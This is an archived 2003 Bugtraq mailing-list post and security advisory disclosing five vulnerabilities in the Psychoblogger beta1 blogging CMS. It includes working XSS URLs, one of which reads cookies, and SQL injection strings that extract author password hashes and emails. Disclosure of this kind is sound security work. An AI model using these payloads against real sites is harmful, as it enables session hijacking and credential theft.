Multiple Vulns in Psychoblogger beta1

• Previous message: Dr`Ponidi Haryanto: "QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 23 Dec 2003 15:51:57 -0800 (PST)
To: bugtraq@securityfocus.com

Hello Bugtraq,

As a part of a recent code audit of the Psychoblogger beta1 code, multiple vulnerabilities were found in the standard distributed code base.

These vulnerabilities range from XSS exploits to SQL Injection exploits.

All details in attached advisory or at http://www.fribble.net/advisories/psychoblogger_19-12-03.txt

Kind Regards,

Calum Power
PS - Happy Christmas to everyone =)

_____________________________________________________________
Get 'yourname@elitehaven.net' free with 6mb of free email storage space! Visit http://www.elitehaven.net

---------------------------------------
Title: Multiple vulnerabilities in Psychoblogger CMS package

Package description (From vendor website):
"This is a PHP/MySQL blogging tool with many features."

Vendor website:
http://www.psychoblogger.com

Affected versions:
To the best of my knowlege, there is only one public release available; PB-beta1
There may or may not have been some private developement done (unconfirmed).

Summary:
Psychoblogger is a CMS package aimed at providing weblogs (or 'blogs') with an easy to set up
system for editing and authoring the content.
The standard package has many inherit vulnerabilities that may allow the compromise of a web server
or website using the distributed code.

Vendor Contact:
Author contacted, advisory acknowledged, fixes to be released soon.

---------------------------------------
Vulnerabilities


VULN #1:
    There is a Cross-Site-Scriting vulnerability in the script 'imageview.php',
    which allows for insertion of scripting on the client-side. This can be exploited by setting
    the 'desc' get variable. This variable is printed without any checking, in between the <title> tags.
    Because scripting cannot be inserted directly into the title, one must first break out of the <title> tag.
    This can be exploited like so:
    http://server.com/imageview.php?desc=><script>alert(document.cookie)</script>
    
    IMPACT: Low/Medium - This vulnerability may be able to be exploited to hijack the session of a currently logged-in
    editor, and thus gaining administrative privileges over the weblog. However, (as usual) XSS vulns are quite hard to
    exploit successfully.

VULN #2
    A Cross-site-scripting vulnerability exists in the script 'entryadmin.php', 'authoredit.php', 'blockedit.php'
    'configadmin.php' and 'quoteedit.php'. These vulnerabilities can be exploited by using a URI similar to the one below:
    http://server.com/entryadmin.php?error=1&errormessage=>alert('xss')</script>
    
    IMPACT: Low - These vulnerabilities may only be exploited if the user is currently logged in to the 'editor'
    interface, and as such may be incredibly hard to exploit successfully.

VULN #3
    A SQL-Injection vulnerability exists in the 'shouts.php' by using the variable 'shoutlimit'.
    I have not been able to succesfully exploit this vulnerability to any great extent using UNION, as the original
    script query already includes a 'order by' statement. However, the severity of this vuln is still quite large,
    and if any wishes to provide some POC code for this, please let me know =)
    
    IMPACT: Severe - SQL-Injection vulnerabilities can be used to obtain usernames and passwords of preveliged accounts
    on the website.

VULN #4
    Another SQL-Injection vulnerability exists in the comments.php script, using the variable 'blogid'.
    By sending a HTTP 'POST' request to the file 'comments.php', with the variable 'blogid' set to the exploit string below,
    an attacker could potentially obtain encrypted passwords for later brute-forcing.
    The SQL injection that could exploit this vulnerability is demonstrated here:
        1 and 'a'='z' union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid from blog_authors ba, blog_entries be where 'a'='a'
    This string manipulates the SQL query into looking something like this:
        select blogid,preview,entry,be.dateentered,title,pageviews,usepreview,name from blog_entries be inner join blog_authors ba on be.authorid=ba.authorid
        where blogid=1 and 'a'='z' union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid from blog_authors ba, blog_entries be where 'a'='a'
        and be.active=1
    Which returns a result set that lists the user rights of the first user in the database (usually the administrator)
    
    IMPACT: Critical - This vulnerability could allow for the stealing of encrypted passwords from the database,
    which then allows them to be brute-forced
    
VULN #5
    A third SQL-Injection vulnerability exists in the script 'functions.php' in the method blogs() where a SQL query is built.
    (Note: The actual query is executed in 'userfunctions.php', method showblogs() in the appropriate skins directory)
    By sending a request to the script 'category.php', one can manipulate the string into outputting an author password.
    The SQL injection that could exploit this string is thus:
        1 and 1=2 union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid,be.preview from blog_authors ba, blog_entries be where 1=1
    This would manipulate the string into something like this:
        select be.blogid,be.preview,be.entry,be.dateentered,be.title,be.pageviews,be.usepreview,ba.name,be.pinned from blog_entries be inner join blog_authors ba
        on be.authorid=ba.authorid where catid=1 and 1=2 union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid,be.preview from blog_authors ba,
        blog_entries be where 1=1 and be.active=1 order by be.dateentered desc
    
    IMPACT: Critical - This vulnerability might allow for the stealing of encrypted password strings from the database.

• Previous message: Dr`Ponidi Haryanto: "QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]